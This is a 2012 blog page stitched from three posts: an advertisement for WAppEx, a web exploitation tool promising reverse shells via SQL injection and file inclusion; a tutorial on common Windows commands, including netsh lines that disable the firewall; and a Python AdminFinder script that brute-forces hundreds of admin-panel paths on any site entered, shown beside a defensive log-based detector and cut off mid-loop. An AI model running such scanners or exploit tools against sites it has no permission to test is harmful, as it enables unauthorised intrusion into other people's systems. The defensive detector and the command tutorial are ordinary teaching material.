Sunday, 19 August 2012 (B.E. 2555)

WAppEx : Web Application Exploiter

WAppEx is an integrated platform for penetration testing and exploitation of web applications on Windows or Linux. It can automatically check the given target for all types of security vulnerabilities and then lets you run various payloads to exploit and take advantage of the vulnerability.
WAppEx is a multi-platform application that runs on both Linux and Windows.

WAppEx's database, which includes hundreds of exploits, provides automated, comprehensive and reliable exploitation for penetration testers and security professionals worldwide.
Regular database updates are available. Top priority goes to high-risk and zero-day vulnerabilities.

The payloads used in the exploits are reliable payloads that include connect-back, listener shell, arbitrary code execution, arbitrary file upload, and more.


WAppEx's script-based engine lets experienced users write their own scripts and payloads to test and exploit any vulnerability in web applications.

Software and vulnerability updates are available at any time, and daily support is available via phone or email.

WAppEx can exploit the following web application vulnerabilities:

SQL Injection:
The most dangerous vulnerability in web applications. WAppEx uses the engine of Havij - Advanced SQL Injection Tool to find and exploit this vulnerability.

Remote File Inclusion:
It allows an attacker to include a remote file. WAppEx can check for this vulnerability and run various payloads to execute commands on the web server.

Local File Inclusion:
It allows an attacker to include a local file. Just like RFI, WAppEx tests and exploits this vulnerability.

OS Commanding:
It lets the attacker execute OS commands on the server. WAppEx tests and exploits this vulnerability, executing custom commands to get a reverse shell.

Script injection:
It can be used by an attacker to introduce (or "inject") script into a web application. WAppEx automatically tests and exploits this vulnerability to escalate access to the web server and get a reverse shell.

Local File Disclosure:
As the name says, it discloses the content of local files on the web server. WAppEx can exploit this vulnerability to read sensitive files on the server.


WAppEx contains the following tools to help you in penetration testing and exploiting web apps.
  • Online Hash Cracker: A tool for cracking hashes using reverse lookup on online sites.
  • Encoder/Decoder: An encoder/decoder with a complete set of encryption algorithms.
  • Find Login Page: Looks for login pages on a target.
  • Browser: A small browser you can use to view source code and HTTP headers.
WAppEx is easy to use and also very flexible. Whether you are a beginner or a professional, WAppEx makes your work easier, faster and more effective.

Top 10 Important Command Prompt Commands

In this tutorial I will guide you through the top 10 important and well-known command prompt commands and their usage.

1. ipconfig
This is the top command for viewing the IP address, subnet mask and default gateway; it also displays and flushes the DNS cache and re-registers the system name in DNS. It is the most useful tool for viewing and troubleshooting TCP/IP problems.



  • To view the IP address and subnet mask: ipconfig
  • To view all TCP/IP information, use: ipconfig /all
  • To view the local DNS cache, use: ipconfig /displaydns
  • To delete the contents in the local DNS cache, use: ipconfig /flushdns

2. systeminfo

Need to display operating system configuration information for a local or remote machine, including service pack levels? Then systeminfo is the tool to use. When I need to connect to a system that I am not familiar with, this is the first tool I run. The output of this command gives me all the info I need, including: host name, OS type, version, product ID, install date, boot time and hardware info (processor and memory). Knowing which hotfixes are installed can also be a big help when troubleshooting problems. This tool can be used to connect to a machine remotely using the following syntax: SYSTEMINFO /S system /U user


3. tasklist and taskkill

If you work with Task Manager (Ctrl+Alt+Del), you can easily understand this. The task list is the list of tasks currently running on Windows. If you open any application, it is added to the list.

To list the tasks, type in cmd:

tasklist
This shows the list of running tasks, as in the picture




To stop a process or task, there are two methods:
Using the image name:
We can kill the task using its image name as follows:
taskkill /im notepad.exe

Using the process ID:
We can stop the process using its process ID as follows:
taskkill /pid 1852




4. type
type is used to read a text document in the command prompt. You can read multiple text files one after another.

type filename.txt


5. netstat
Need to know who (or what) is making a connection to your computer? Then netstat is the tool you want to run. The output provides valuable information on all connections and listening ports, including the executable used for each connection. In addition to the above, you can view Ethernet statistics and resolve connecting host IP addresses to fully qualified domain names. I usually run the netstat command with the -a (display all connection info), -n (show addresses and ports in numerical form) and -b (display executable name) switches.
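The netstat and tasklist sections above are usually combined during triage: which process owns each listening port. The following PowerShell function is an added example, not part of the original tutorial; it joins the PID column of netstat -ano with tasklist, and assumes an elevated prompt so that netstat reports a PID for every socket.

```powershell
# Added example: map every LISTENING TCP socket to the image name that owns it,
# by joining the PID column of "netstat -ano" with "tasklist /fi".
# Assumption: run from an elevated prompt so all PIDs are reported.
function Get-ListeningSocketOwners {
    $result = @()
    # netstat -ano rows look like: Proto  LocalAddress  ForeignAddress  State  PID
    foreach ($line in (netstat -ano | Select-String -SimpleMatch 'LISTENING')) {
        $fields = $line.ToString().Trim() -split '\s+'
        if ($fields.Count -lt 5) { continue }
        $ownerPid = $fields[4]

        # /fi filters on the PID, /fo csv /nh returns one quoted CSV row with no header.
        # A PID with no matching task yields an "INFO: ..." message instead of a row.
        $row = tasklist /fi "PID eq $ownerPid" /fo csv /nh
        $image = if ($row -and "$row" -like '"*') {
            ("$row" -split '","')[0].TrimStart('"')
        } else {
            '<unknown>'
        }

        $result += [pscustomobject]@{
            Proto        = $fields[0]
            LocalAddress = $fields[1]
            PID          = [int]$ownerPid
            Image        = $image
        }
    }
    $result | Sort-Object PID
}

Get-ListeningSocketOwners | Format-Table -AutoSize
```

Compare the Image column against what you expect to be listening on the host; an unfamiliar image bound to a port is the same signal netstat -b gives, but here it is one row per socket and easy to export.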


6. net command
Although this tool is better known as a command, the net command is really like a power drill with different bits and is used to update, fix, or view the network or network settings.
It is mostly used for viewing (only services that are started), stopping and starting services:
    • net stop server
    • net start server
    • net start (display running services)
and for connecting (mapping) and disconnecting shared network drives:
    • net use m: \\myserver\sharename
    • net use m: \\myserver\sharename /delete
Other commands used with net are net accounts (manage user accounts), net print (manage print jobs), and net share (manage shares).
Below are all the options that can be used with the net command.
[ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP | HELPMSG | LOCALGROUP | PAUSE | PRINT | SESSION | SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

7. nslookup
With the Internet, DNS (Domain Name Service) is the key that lets us use friendly names when surfing the web instead of having to remember IP addresses. When there are problems, nslookup is a valuable tool for testing and troubleshooting DNS servers.
Nslookup can be run in two modes: interactive and non-interactive. Non-interactive mode is useful when only a single piece of data needs to be returned. For example, to resolve google.com: nslookup google.com

To use the interactive mode, just type nslookup at the prompt. To see all available options, type help while in interactive mode.

Don't let the help results intimidate you. Nslookup is easy to use. Some of the options I use when troubleshooting are:
set ds (displays detailed debugging information about the behind-the-scenes communication when resolving a host or IP address).
set domain (sets the default domain to use when resolving, so you don't need to type the fully qualified name each time).
set type (sets the query record type that will be returned, such as A, MX, NS).
server NAME (points nslookup at a DNS server other than the one configured on your computer).
To exit interactive mode, type exit.

8. ping and tracert
These tools are helpful for checking connectivity to other systems. Ping tests whether a particular host is reachable across an IP network, while tracert (traceroute) determines the route taken by packets across an IP network.
To ping a system, just type at the prompt: ping www.google.com. By default, ping sends three ICMP echo requests to the host and listens for ICMP "echo reply" responses. Ping also includes switches to control the number of echo requests to send (-n) and to resolve IP addresses to hostnames (-a).
To use tracert, type at the prompt: tracert www.google.com. You can force tracert not to resolve addresses to hostnames with the -d switch, or set the desired timeout (in milliseconds) for each reply with the -w switch.
9. gpresult
Used mostly in environments that implement group policies, gpresult (Group Policy Results) shows all policy settings in effect for a specific user or computer. The command is simple to use: just enter gpresult at the prompt. It can also be used to connect to computers remotely using the /S and /U switches.
10. netsh
Without a doubt the most powerful command line tool available in Windows. Netsh is the Swiss army knife for configuring and monitoring Windows computers from the command prompt. Its capabilities include:
  • Configure interfaces
  • Configure routing protocols
  • Configure filters
  • Configure routes
  • Configure remote access behavior for Windows-based remote access routers that are running the Routing and Remote Access Server (RRAS) Service
  • Display the configuration of a currently running router on any computer
Some examples of what you can do with netsh:
  • Enable or disable Windows firewall:
netsh firewall set opmode enable
netsh firewall set opmode disable
  • Enable or disable ICMP Echo Request (for pinging) in Windows firewall:
netsh firewall set icmpsetting 8 enable
netsh firewall set icmpsetting 8 disable
  • Configure your NIC to obtain an IP address automatically from a DHCP server:
netsh interface ip set address "Local Area Connection" dhcp
(For the above command, if your NIC is named something else, use netsh interface ip show config and replace "Local Area Connection" with that name.)
As you can see, netsh can do a lot. Instead of re-inventing the wheel, check out the following Microsoft article for more info on netsh.

Friday, 17 August 2012 (B.E. 2555)

Find Admin Login


Admin Page Scripts(1)

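The AdminFinder script that follows requests a long wordlist of admin-looking paths one after another and reports anything that does not answer 404. Before the script itself, an added defender-side example (Python 3; not part of the original post): detection logic that flags exactly that request pattern in a web server access log. The log lines are constructed samples in Common Log Format, and the thresholds are assumptions to tune per site.

```python
"""Detect admin-panel path probing in a web server access log (added example).

The scanner pattern to catch: one client requesting many distinct admin-looking
paths within a short window, most of them answered with 404. A real administrator
touches only a handful of such paths, so a distinct-path threshold separates them.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines (Common Log Format): 203.0.113.7 behaves like the
# scanner, 198.51.100.22 is a legitimate administrator logging in.
SAMPLE_LOG = """\
203.0.113.7 - - [17/Aug/2012:10:00:01 +0700] "GET /admin/ HTTP/1.1" 404 512
203.0.113.7 - - [17/Aug/2012:10:00:01 +0700] "GET /administrator/ HTTP/1.1" 404 512
203.0.113.7 - - [17/Aug/2012:10:00:02 +0700] "GET /admin1/ HTTP/1.1" 404 512
203.0.113.7 - - [17/Aug/2012:10:00:02 +0700] "GET /webadmin/ HTTP/1.1" 404 512
203.0.113.7 - - [17/Aug/2012:10:00:03 +0700] "GET /admin/login.php HTTP/1.1" 404 512
203.0.113.7 - - [17/Aug/2012:10:00:03 +0700] "GET /admin_area/login.php HTTP/1.1" 404 512
203.0.113.7 - - [17/Aug/2012:10:00:04 +0700] "GET /moderator/login.php HTTP/1.1" 302 0
203.0.113.7 - - [17/Aug/2012:10:00:04 +0700] "GET /admincp/index.asp HTTP/1.1" 404 512
203.0.113.7 - - [17/Aug/2012:10:00:05 +0700] "GET /wp-login.php HTTP/1.1" 404 512
203.0.113.7 - - [17/Aug/2012:10:00:05 +0700] "GET /controlpanel.php HTTP/1.1" 404 512
198.51.100.22 - - [17/Aug/2012:10:00:05 +0700] "GET /admin/login.php HTTP/1.1" 200 4096
198.51.100.22 - - [17/Aug/2012:10:00:09 +0700] "POST /admin/login.php HTTP/1.1" 302 0
198.51.100.22 - - [17/Aug/2012:10:00:10 +0700] "GET /admin/index.php HTTP/1.1" 200 8192
"""

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
# Fragments shared by the wordlists such a scanner walks through.
ADMIN_HINT_RE = re.compile(
    r'admin|moderator|controlpanel|(^|/)cp\.|wp-login|usuario|acceso|memberadmin', re.I
)


def parse_line(line):
    """Return (ip, timestamp, path-without-query, status) for one CLF line, or None."""
    m = CLF_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group('ts'), '%d/%b/%Y:%H:%M:%S %z')
    return m.group('ip'), ts, m.group('path').split('?')[0], int(m.group('status'))


def detect_admin_probing(lines, window_seconds=60, min_distinct=8, min_miss_ratio=0.6):
    """Flag clients that request at least `min_distinct` different admin-looking
    paths inside `window_seconds`, with a 404 share of at least `min_miss_ratio`.
    Thresholds are assumptions; returns one alert dict per flagged client."""
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and ADMIN_HINT_RE.search(rec[2]):
            by_ip[rec[0]].append(rec)

    alerts = []
    for ip, events in by_ip.items():
        events.sort(key=lambda e: e[1])
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until it spans at most window_seconds.
            while (events[end][1] - events[start][1]).total_seconds() > window_seconds:
                start += 1
            window = events[start:end + 1]
            paths = {e[2] for e in window}
            misses = sum(1 for e in window if e[3] == 404)
            if len(paths) >= min_distinct and misses / len(window) >= min_miss_ratio:
                alerts.append({'ip': ip, 'distinct_paths': len(paths),
                               'not_found': misses, 'requests': len(window),
                               'first': window[0][1], 'last': window[-1][1]})
                break  # one alert per client is enough
    return alerts


if __name__ == '__main__':
    for alert in detect_admin_probing(SAMPLE_LOG.splitlines()):
        print(alert)
```

Feed it a real access log with `detect_admin_probing(open(path))` and raise `min_distinct` if your own administrators trip it.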
#Created for coded32 and his teamopenfire. Eliminated some bugs from my last code shared here as Guest.
#Greets To T.O.F and Indishell
#Thanks friends for finding bugs and giving suggestions

#cd directory/to/code
#directory/to/code>python code.py

#improved error handling
#Find out useful stuff from www.teamopenfire.com
#"wE aRe gREat inDIans"

import httplib
import socket
import sys


try:
    print "\t################################################################"
    print "\t#                                        www.teamopenfire.com  #"
    print "\t#       ###############      ########       ############       #"
    print "\t#       #             #     ##      ##      #          #       #"
    print "\t#       ######   ######     ##      ##      #   ########       #"
    print "\t#            #   #          ##      ##      #   #              #"
    print "\t#            #   #          ##      ##      #   #####          #"
    print "\t#            #   #          ##      ##      #   #####          #"
    print "\t#            #   #          ##      ##      #   #              #"
    print "\t#            #   #          ##      ##      #   #              #"
    print "\t#            #####    [#]    ########   [#] #####  AdminFinder #"
    print "\t#                                                              #"
    print "\t#                                            coded by Ajith KP #"
    print "\t#                          Greets to Coded32 and T.O.F members #"
    print "\t################################################################"
    var1=0
    var2=0

    php = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php',
'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html',
'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php',
'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php',
'bb-admin/index.html','bb-admin/login.html','acceso.php','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php',
'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html',
'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html',
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html',
'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php',
'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php',
'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','usuarios/login.php',
'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php']

    asp = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
'administrator/account.asp','administrator.asp','acceso.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html',
'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html']

    cfm = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm','admin/account.cfm',
'admin_area/admin.cfm','admin_area/login.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm','admin/home.cfm','admin_area/login.html','admin_area/index.html',
'admin/controlpanel.cfm','admin.cfm','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
'admin/cp.cfm','cp.cfm','administrator/index.cfm','administrator/login.cfm','nsw/admin/login.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm',
'administrator/account.cfm','administrator.cfm','admin_area/admin.html','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm',
'moderator/admin.cfm','account.cfm','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.cfm','admincontrol.cfm',
'admin/adminLogin.html','acceso.cfm','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.cfm','adminarea/index.html','adminarea/admin.html',
'webadmin.cfm','webadmin/index.cfm','webadmin/admin.cfm','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.cfm','moderator.html',
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.cfm','account.html','controlpanel.html','admincontrol.html',
'panel-administracion/login.cfm','wp-login.cfm','adminLogin.cfm','admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm',
'adminarea/admin.cfm','adminarea/login.cfm','panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm',
'modelsearch/admin.cfm','admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','usuarios/login.cfm',
'adm/index.cfm','adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm']

    js = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','admin/account.js','admin/index.js','admin/login.js','admin/admin.js','admin/account.js',
'admin_area/admin.js','admin_area/login.js','siteadmin/login.js','siteadmin/index.js','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/index.js','bb-admin/index.js','bb-admin/login.js','bb-admin/admin.js','admin/home.js','admin_area/login.html','admin_area/index.html',
'admin/controlpanel.js','admin.js','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
'admin/cp.js','cp.js','administrator/index.js','administrator/login.js','nsw/admin/login.js','webadmin/login.js','admin/admin_login.js','admin_login.js',
'administrator/account.js','administrator.js','admin_area/admin.html','pages/admin/admin-login.js','admin/admin-login.js','admin-login.js',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.js','modelsearch/login.js','moderator.js','moderator/login.js',
'moderator/admin.js','account.js','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.js','admincontrol.js',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.js','adminarea/index.html','adminarea/admin.html',
'webadmin.js','webadmin/index.js','acceso.js','webadmin/admin.js','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.js','moderator.html',
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.js','account.html','controlpanel.html','admincontrol.html',
'panel-administracion/login.js','wp-login.js','adminLogin.js','admin/adminLogin.js','home.js','admin.js','adminarea/index.js',
'adminarea/admin.js','adminarea/login.js','panel-administracion/index.js','panel-administracion/admin.js','modelsearch/index.js',
'modelsearch/admin.js','admincontrol/login.js','adm/admloginuser.js','admloginuser.js','admin2.js','admin2/login.js','admin2/index.js','usuarios/login.js',
'adm/index.js','adm.js','affiliate.js','adm_auth.js','memberadmin.js','administratorlogin.js']

    cgi = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','admin/account.cgi','admin/index.cgi','admin/login.cgi','admin/admin.cgi','admin/account.cgi',
'admin_area/admin.cgi','admin_area/login.cgi','siteadmin/login.cgi','siteadmin/index.cgi','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/index.cgi','bb-admin/index.cgi','bb-admin/login.cgi','bb-admin/admin.cgi','admin/home.cgi','admin_area/login.html','admin_area/index.html',
'admin/controlpanel.cgi','admin.cgi','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
'admin/cp.cgi','cp.cgi','administrator/index.cgi','administrator/login.cgi','nsw/admin/login.cgi','webadmin/login.cgi','admin/admin_login.cgi','admin_login.cgi',
'administrator/account.cgi','administrator.cgi','admin_area/admin.html','pages/admin/admin-login.cgi','admin/admin-login.cgi','admin-login.cgi',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.cgi','modelsearch/login.cgi','moderator.cgi','moderator/login.cgi',
'moderator/admin.cgi','account.cgi','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.cgi','admincontrol.cgi',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.cgi','adminarea/index.html','adminarea/admin.html',
'webadmin.cgi','webadmin/index.cgi','acceso.cgi','webadmin/admin.cgi','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.cgi','moderator.html',
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.cgi','account.html','controlpanel.html','admincontrol.html',
'panel-administracion/login.cgi','wp-login.cgi','adminLogin.cgi','admin/adminLogin.cgi','home.cgi','admin.cgi','adminarea/index.cgi',
'adminarea/admin.cgi','adminarea/login.cgi','panel-administracion/index.cgi','panel-administracion/admin.cgi','modelsearch/index.cgi',
'modelsearch/admin.cgi','admincontrol/login.cgi','adm/admloginuser.cgi','admloginuser.cgi','admin2.cgi','admin2/login.cgi','admin2/index.cgi','usuarios/login.cgi',
'adm/index.cgi','adm.cgi','affiliate.cgi','adm_auth.cgi','memberadmin.cgi','administratorlogin.cgi']

    brf = ['admin/','administrator/','admin1/','admin2/','admin3/','admin4/','admin5/','usuarios/','usuario/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/',
'memberadmin/','administratorlogin/','adm/','admin/account.brf','admin/index.brf','admin/login.brf','admin/admin.brf','admin/account.brf',
'admin_area/admin.brf','admin_area/login.brf','siteadmin/login.brf','siteadmin/index.brf','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'admin_area/index.brf','bb-admin/index.brf','bb-admin/login.brf','bb-admin/admin.brf','admin/home.brf','admin_area/login.html','admin_area/index.html',
'admin/controlpanel.brf','admin.brf','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html',
'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html',
'admin/cp.brf','cp.brf','administrator/index.brf','administrator/login.brf','nsw/admin/login.brf','webadmin/login.brf','admin/admin_login.brf','admin_login.brf',
'administrator/account.brf','administrator.brf','acceso.brf','admin_area/admin.html','pages/admin/admin-login.brf','admin/admin-login.brf','admin-login.brf',
'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.brf','modelsearch/login.brf','moderator.brf','moderator/login.brf',
'moderator/admin.brf','account.brf','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.brf','admincontrol.brf',
'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.brf','adminarea/index.html','adminarea/admin.html',
'webadmin.brf','webadmin/index.brf','webadmin/admin.brf','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.brf','moderator.html',
'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html',
'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html',
'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.brf','account.html','controlpanel.html','admincontrol.html',
'panel-administracion/login.brf','wp-login.brf','adminLogin.brf','admin/adminLogin.brf','home.brf','admin.brf','adminarea/index.brf',
'adminarea/admin.brf','adminarea/login.brf','panel-administracion/index.brf','panel-administracion/admin.brf','modelsearch/index.brf',
'modelsearch/admin.brf','admincontrol/login.brf','adm/admloginuser.brf','admloginuser.brf','admin2.brf','admin2/login.brf','admin2/index.brf','usuarios/login.brf',
'adm/index.brf','adm.brf','affiliate.brf','adm_auth.brf','memberadmin.brf','administratorlogin.brf']
    
    try:
        site = raw_input("Web Site for Scan?: ")
        site = site.replace("http://","")
        print ("\tChecking website " + site + "...")
        conn = httplib.HTTPConnection(site)
        conn.connect()
        print "\t[$] Yes... Server is Online."
    except (httplib.HTTPException, socket.error):
        # HTTPResponse is not an exception class; catch the real network errors
        raw_input("\t [!] Oops Error occured, Server offline or invalid URL")
        sys.exit()
    print "Enter site source code:"
    print "1 PHP"
    print "2 ASP"
    print "3 CFM"
    print "4 JS"
    print "5 CGI"
    print "6 BRF"
    print "\nPress 1 and 'Enter key' for Select PHP\n"
    code = int(raw_input("> "))  # raw_input + int: do not eval() user input
        
    if code==1:
        print("\t [+] Scanning " + site + "...\n\n")
        for admin in php:
            admin = admin.replace("\n","")
            admin = "/" + admin
            host = site + admin
            print ("\t [#] Checking " + host + "...")
            connection = httplib.HTTPConnection(site)
            connection.request("GET",admin)
            response = connection.getresponse()
            var2 = var2 + 1
            if response.status == 200:
                var1 = var1 + 1
                print "%s %s" % ( "\n\n>>>" + host, "Admin page found!")
                raw_input("Press enter to continue scanning.\n")
            elif response.status == 404:
                var2 = var2
            elif response.status == 302:
                print "%s %s" % ("\n>>>" + host, "Possible admin page (302 - Redirect)")
            else:
                print "%s %s %s" % (host, " Interesting response:", response.status)
            connection.close()
        print("\n\nCompleted \n")
        print var1, " Admin pages found"
        print var2, " total pages scanned"
        raw_input("[/] The Game Over; Press Enter to Exit")


    if code==2:
        print("\t [+] Scanning " + site + "...\n\n")
        for admin in asp:
            admin = admin.replace("\n","")
